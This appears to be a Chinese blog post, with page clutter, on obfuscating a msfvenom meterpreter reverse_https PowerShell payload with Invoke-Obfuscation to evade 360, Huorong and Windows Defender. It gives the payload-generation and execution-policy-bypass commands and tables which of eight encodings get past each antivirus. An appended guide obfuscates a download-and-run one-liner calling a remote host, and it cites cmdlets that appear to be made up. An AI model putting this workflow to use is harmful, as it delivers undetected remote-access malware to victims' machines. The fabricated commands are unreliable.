Invoke-Obfuscation混淆免杀过360和火绒

微信公众号:乌鸦安全 

图片

扫取二维码获取更多信息!

 

更新时间:2021-05-31

Invoke-Obfuscation下载地址:https://github.com/danielbohannon/Invoke-Obfuscation

参考文档 https://blog.youkuaiyun.com/weixin_44216796/article/details/112723993

先说下结果:

Invoke-ObfuscationEncoding部分方法混淆可以过360和火绒,但是过不了Windows Defender

1. 模块使用

导入模块

Import-Module C:\0_poweshell\Invoke-Obfuscation-master\Invoke-Obfuscation.psd1

这里注意,一定要写上完整路径,不然会报错

加载模块

Invoke-Obfuscation

 

支持的加密方法:

  • TOKEN支持分部分混淆
    STRING整条命令混淆
    COMPRESS将命令转为单行并压缩,
    ENCODING编码
    LAUNCHER选择执行方式
    

     

2. msfvenom下msf上线

 

首先用msfvenom生成一个ps1文件

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.211.55.2 LPORT=4444 -f psh-reflection > msf-crow.ps1

 

然后设置监听:

然后回到win10

2.1 360

直接在有360的环境下进行执行(这里不做云查杀和杀毒的操作)

PowerShell.exe -ExecutionPolicy Bypass -File .\msf-crow.ps1

 

上线成功。

这里来一次查杀,首先使用按位置查杀

 

 

 

报毒,直接在这个位置关闭,不处理

 

再运行一次,此时360提示有毒。

2.2 Windows defender

 

复制到Windows sever2019下,Windows Defender直接杀掉

2.3 火绒

关掉Windows Defender

 

 

 

直接使用火绒扫描,没扫描到。

上线试试:

 

 

直接就上线了!!!

2.4 总结

因此在此可以进行如下总结:

msfvenom最新版(2021-05-28安装)生成powershell攻击脚本在静态下的查杀效果:

 

 

火绒

360

Windows Defender

windows 10 64位

未测

未测

windows server 2019 64位

✔️

未测

ps:以上环境都联网状态下

 

同样

msfvenom最新版(2021-05-28安装)生成powershell攻击脚本在动态执行上线的查杀效果:

 

 

火绒

360

Windows Defender

windows 10 64位

未测

未测

windows server 2019 64位

✔️

未测

ps:以上环境都联网,且均在cmd中执行-ExecutionPolicy Bypass来绕过执行安全策略进行上线。

 

这里可以看到,360在第一次并不拦截,而且还可以上线,这可能由于我用的是虚拟机,如果是实体机的话,应该会被杀。

 

3. 混淆大法

 

设置需要混淆的木马文件路径

 set scriptpath C:\0_poweshell\msf-crow.ps1

 

4. 第一种混淆 1

encoding

选择第一种方法混淆

1

将文件输出的out 1.ps1

 

文件路径:

C:\0_poweshell\Invoke-Obfuscation-master\1.ps1

攻击机开启监听模式:

上线测试:

4.1 360

 

360环境下直接运行(生成之后没有杀毒扫描)

PowerShell.exe -ExecutionPolicy Bypass -File C:\0_poweshell\Invoke-Obfuscation-master\1.ps1

 

这里是在cmd命令行下执行PowerShell命令的

-ExecutionPolicy Bypass:绕过执行安全策略,在默认情况下,PowerShell的安全策略规定了PowerShell不允许运行命令和文件。通过设置这个参数,可以绕过任意一个安全保护规则。在渗透测试中,基本每一次运行PowerShell脚本时都要使用这个参数。(参考:https://blog.youkuaiyun.com/Eastmount/article/details/115503946

 

360下上线成功

 

但使用360云查杀之后显示报毒:

4.2 windows Defender

windows Defender 直接静态被杀

4.3 火绒

火绒,静态扫描报毒

动态上线失败

4.4 总结

静态查杀

 

火绒

360

Windows Defender

windows 10 64位

未测

未测

windows server 2019 64位

未测

全挂。。。

5. 第2种混淆 2

 

 

这里先静态测试下:

5.1 火绒

 

火绒:

 

 

5.2 360

360云查杀

 

 

5.3 Windows Defender

 

静态查杀能力:

 

火绒

360

Windows Defender

windows 10 64位

未测

✔️

未测

windows server 2019 64位

未测

✔️

 

动态上线能力:

PowerShell.exe -ExecutionPolicy Bypass -File C:\0_poweshell\Invoke-Obfuscation-master\2.ps1

 

火绒:

静态查杀,动态上线失败

 

windf:

静态查杀正常,动态上线失败

 

360:

动态上线失败,而且清除了木马,因此这里360也是静动均查杀了木马

此时对其进行重新调整:

 

5.4 总结

静态查杀能力:

 

火绒

360

Windows Defender

windows 10 64位

未测

未测

windows server 2019 64位

未测

✔️

动态上线:

 

火绒

360

Windows Defender

windows 10 64位

未测

未测

windows server 2019 64位

未测

6. 第三种方法 3

 

6.1 360

 

动态上线测试

再次云查杀

 

6.2 火绒

 

 

6.3 windows Defender

静态正常

动态:失败

6.4 总结

静态查杀能力:

 

火绒

360

Windows Defender

windows 10 64位

未测

✔️

未测

windows server 2019 64位

未测

✔️

动态上线:

 

火绒

360

Windows Defender

windows 10 64位

未测

✔️

未测

windows server 2019 64位

未测

7. 第四种方法 4

7.1 360

 

上线测试

 

7.2 火绒

 

动态正常

 

 

 

 

7.3 windows Defender

静态过了

 

动态上线失败

7.4 总结

静态查杀能力:

 

火绒

360

Windows Defender

windows 10 64位

未测

✔️

未测

windows server 2019 64位

✔️

未测

✔️

动态上线:

 

火绒

360

Windows Defender

windows 10 64位

未测

✔️

未测

windows server 2019 64位

✔️

未测

 

8. 第五种方法 5

 

 

现在验证下各种查杀

 

8.1 360

 

动态上线

 

8.2 火绒

 

8.3 window defender

 

 

都报错,那再生成一次,这次报错更多了

 

8.4 总结

 

静态查杀能力:

 

火绒

360

Windows Defender

windows 10 64位

未测

✔️

未测

windows server 2019 64位

✔️

未测

✔️

动态上线:

 

火绒

360

Windows Defender

windows 10 64位

未测

运行报错

未测

windows server 2019 64位

运行报错

未测

运行报错

 

9. 第6种方法 6

 

 

9.1 360

 

 

动态上线测试,上线正常

再杀一次,还是正常

 

9.2 火绒

 

 

9.3 window defender

9.4 总结

 

 

静态查杀能力:

 

火绒

360

Windows Defender

windows 10 64位

未测

✔️

未测

windows server 2019 64位

✔️

未测

动态上线:

 

火绒

360

Windows Defender

windows 10 64位

未测

✔️

未测

windows server 2019 64位

✔️

未测

 

 

10. 第七种方法 7

 

10.1 360

 

 

动态上线测试,win10下的powershell崩掉,应该是由于字符太大的原因

 

 

10.2 火绒

 

动态上线测试:

 

10.3 window defender

由于脚本无法在我的win10下测试,这里到winserver2019上进行测试,开启Windows defender防护

上线失败

 

 

 

 

10.4 总结

 

静态查杀能力:

 

火绒

360

Windows Defender

windows 10 64位

未测

✔️

未测

windows server 2019 64位

✔️

未测

✔️

动态上线:

 

火绒

360

Windows Defender

windows 10 64位

未测

✔️

未测

windows server 2019 64位

✔️

未测

 

11. 第八种方法 8

11.1 360

 

 

11.2 火绒

 

 

 

 

 

11.3 window defender

 

 

11.4 总结

静态查杀能力:

 

火绒

360

Windows Defender

windows 10 64位

未测

✔️

未测

windows server 2019 64位

✔️

未测

✔️

动态上线:

 

火绒

360

Windows Defender

windows 10 64位

未测

✔️

未测

windows server 2019 64位

✔️

未测

 

 

12. 总结

12.1 版本问题

环境:

Windows10 x64 + 360

 

winserver2019 x64 + 火绒

 

windows Defender最新版本

12.2 查杀问题

火绒360Windows defender均采用联网查杀,其中360采用云杀毒模式

 

12.3 bypass av能力总结

msfvenom生成powershell攻击脚本和Invoke-Obfuscation混淆方法在Encoding模式下的静态查杀效果:

 

 

 

msfvenom最新版(2021-05-28安装)

火绒

360

Windows Defender

windows 10 64位

msfvenom最新版(2021-05-28安装)

未测

未测

windows server 2019 64位

msfvenom最新版(2021-05-28安装)

✔️

未测

 

 

方法1: ASCII

火绒

360

Windows Defender

windows 10 64位

方法1: ASCII

未测

未测

windows server 2019 64位

方法1: ASCII

未测

 

方法2: Hex

火绒

360

Windows Defender

windows 10 64位

方法2: Hex

未测

✔️

未测

windows server 2019 64位

方法2: Hex

未测

✔️

 

方法3: Octal

火绒

360

Windows Defender

windows 10 64位

方法3: Octal

未测

✔️

未测

windows server 2019 64位

方法3: Octal

未测

✔️

 

方法4: Binary

火绒

360

Windows Defender

windows 10 64位

方法4: Binary

未测

✔️

未测

windows server 2019 64位

方法4: Binary

✔️

未测

✔️

 

方法5: SecureString (AES)

火绒

360

Windows Defender

windows 10 64位

方法5: SecureString (AES)

未测

✔️

未测

windows server 2019 64位

方法5: SecureString (AES)

✔️

未测

✔️

 

方法6: BXOR

火绒

360

Windows Defender

windows 10 64位

方法6: BXOR

未测

✔️

未测

windows server 2019 64位

方法6: BXOR

✔️

未测

 

方法7: Special Characters

火绒

360

Windows Defender

windows 10 64位

方法7: Special Characters

未测

✔️

未测

windows server 2019 64位

方法7: Special Characters

✔️

未测

✔️

 

方法8: Whitespace

火绒

360

Windows Defender

windows 10 64位

方法8: Whitespace

未测

✔️

未测

windows server 2019 64位

方法8: Whitespace

✔️

未测

✔️

ps:以上环境都联网状态下,360采用云查杀

 

 

同样

msfvenom生成powershell攻击脚本和Invoke-Obfuscation混淆方法在Encoding模式下的动态上线查杀效果:

 

 

 

msfvenom最新版(2021-05-28安装)

火绒

360

Windows Defender

windows 10 64位

msfvenom最新版(2021-05-28安装)

未测

未测

windows server 2019 64位

msfvenom最新版(2021-05-28安装)

✔️

未测

 

方法1: ASCII

火绒

360

Windows Defender

windows 10 64位

方法1: ASCII

未测

未测

windows server 2019 64位

方法1: ASCII

未测

 

方法2: Hex

火绒

360

Windows Defender

windows 10 64位

方法2: Hex

未测

未测

windows server 2019 64位

方法2: Hex

未测

 

方法3: Octal

火绒

360

Windows Defender

windows 10 64位

方法3: Octal

未测

✔️

未测

windows server 2019 64位

方法3: Octal

未测

 

方法4: Binary

火绒

360

Windows Defender

windows 10 64位

方法4: Binary

未测

✔️

未测

windows server 2019 64位

方法4: Binary

✔️

未测

 

方法5: SecureString (AES)

火绒

360

Windows Defender

windows 10 64位

方法5: SecureString (AES)

未测

运行报错

未测

windows server 2019 64位

方法5: SecureString (AES)

运行报错

未测

运行报错

 

方法6: BXOR

火绒

360

Windows Defender

windows 10 64位

方法6: BXOR

未测

✔️

未测

windows server 2019 64位

方法6: BXOR

✔️

未测

 

方法7: Special Characters

火绒

360

Windows Defender

windows 10 64位

方法7: Special Characters

未测

✔️

未测

windows server 2019 64位

方法7: Special Characters

✔️

未测

 

方法8: Whitespace

火绒

360

Windows Defender

windows 10 64位

方法8: Whitespace

未测

✔️

未测

windows server 2019 64位

方法8: Whitespace

✔️

未测

ps:以上环境都联网状态下,360采用云查杀

原文地址:https://mp.weixin.qq.com/s/Nvog8OJZXvPKMqJ8MkwNAQ

### 在 Kali Linux 中使用 Invoke-Obfuscation 工具 Invoke-Obfuscation 是一个功能强大的工具,用于混淆 PowerShell 脚本的不同组件,从而绕过防病毒软件安全检测机制[^1]。以下是关于如何在 Kali Linux 环境中安装使用 Invoke-Obfuscation 的详细说明。 #### 安装 Invoke-Obfuscation 1. 首先确保 Kali Linux 系统是最新的。可以运行以下命令以更新系统: ```bash apt update && apt upgrade -y ``` 2. 安装 Git 其他必要的依赖项: ```bash apt install git python3 python3-pip -y ``` 3. 使用 Git 克隆 Invoke-Obfuscation 项目到本地: ```bash git clone https://gitcode.com/gh_mirrors/in/Invoke-PSObfuscation /opt/Invoke-Obfuscation ``` #### 配置与运行 1. 进入克隆的项目目录: ```bash cd /opt/Invoke-Obfuscation ``` 2. 设置脚本的执行权限(如果需要): ```bash chmod +x *.ps1 ``` 3. 使用 PowerShell 来加载 Invoke-Obfuscation 模块。可以通过以下命令启动 PowerShell 并加载模块: ```powershell powershell.exe -ExecutionPolicy Bypass -NoLogo -NoProfile -File .\invoke-obfuscation.ps1 ``` #### 示例:混淆 PowerShell 脚本 假设需要混淆以下 PowerShell 命令: ```powershell powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:80/b'))" ``` 可以按照以下步骤进行操作: 1. 加载 Invoke-Obfuscation 模块后,选择不同的混淆技术。例如,使用 `Set-CommandObfuscation` 来设置混淆规则: ```powershell Set-CommandObfuscation -Command "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:80/b'))" -ObfuscationLevel High ``` 此命令会生成高度混淆PowerShell 脚本[^4]。 2. 查看生成的混淆脚本并将其保存到文件中: ```powershell $obfuscatedScript = Get-ObfuscatedCommand $obfuscatedScript | Out-File -FilePath ./obfuscated_script.ps1 ``` #### 测试混淆效果 为了测试混淆后的脚本是否能够成功绕过检测,可以在目标环境中运行生成的脚本,并观察其行为。例如,在 Kali Linux 上模拟受害者服务器的行为[^3]: ```bash python3 -m http.server 8000 ``` ### 注意事项 - 在使用 Invoke-Obfuscation 时,请确保遵守相关法律法规,并仅在授权的情况下进行渗透测试。 - 混淆可能会增加脚本的复杂性,但也可能导致脚本性能下降或兼容性问题。 ---
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值